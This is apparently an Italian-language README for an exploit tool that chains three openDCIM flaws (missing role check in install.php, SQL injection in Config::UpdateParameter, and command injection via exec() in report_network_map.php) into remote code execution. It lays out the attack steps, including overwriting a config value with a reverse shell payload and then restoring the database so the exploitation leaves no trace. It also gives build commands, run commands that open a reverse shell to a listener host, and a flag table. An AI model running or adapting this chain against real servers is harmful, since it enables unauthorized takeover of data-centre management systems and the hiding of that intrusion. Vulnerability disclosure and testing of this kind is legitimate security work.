
openDCIM install.php catena da SQLi a RCE (CWE-862 + CWE-89 + CWE-78)
Catena di esecuzione remota di codice che prende di mira il modulo di configurazione LDAP di install.php di openDCIM. Costruita sul framework VulnCheck go-exploit.
| # | CVE | CWE | Descrizione |
|---|
| 1 | CVE-2026-28515 | CWE-862 | install.php non esegue alcun controllo di ruolo prima del modulo di configurazione LDAP - qualsiasi utente può raggiungerlo |
| 2 | CVE-2026-28516 | CWE-89 | Config::UpdateParameter() usa l'interpolazione di stringhe, stacked queries tramite PDO+MySQL |
| 3 | CVE-2026-28517 | CWE-78 | report_network_map.php passa il valore di configurazione dot direttamente a exec() |
Versioni interessate: tutte le versioni (testato sull'ultimo commit 4467e9c4)
install.php - l'iniezione SQL tramite il modulo LDAP esegue il backup della configurazione e sovrascrive dot con un payload di comandoreport_network_map.php - attiva exec(), conferma la RCE tramite l'output di idinstall.php - sovrascrive dot con un payload di reverse shellreport_network_map.php - attiva la reverse shellinstall.php - ripristina tutti i valori di configurazione originali dalla tabella di backupNessuna traccia lasciata nel database dopo lo sfruttamento.
go build -o opendcim-exploit .
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80
# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer
| Flag | Default | Descrizione |
|---|---|---|
-rhost | Host di destinazione | |
-rport | 80 | Porta di destinazione |
-ssl | false | Usa HTTPS |
-lhost | Host del listener (per la reverse shell) | |
-lport | Porta del listener (per la reverse shell) | |
-c2 | Tipo di C2: SimpleShellServer o SSLShellServer | |
-username | Nome utente HTTP Basic Auth (omettere per i deployment SetEnv) | |
-password | Password HTTP Basic Auth (omettere per i deployment SetEnv) | |
-a | Rilevamento asset (verifica se il target è sfruttabile) | |
-e | Modalità exploit |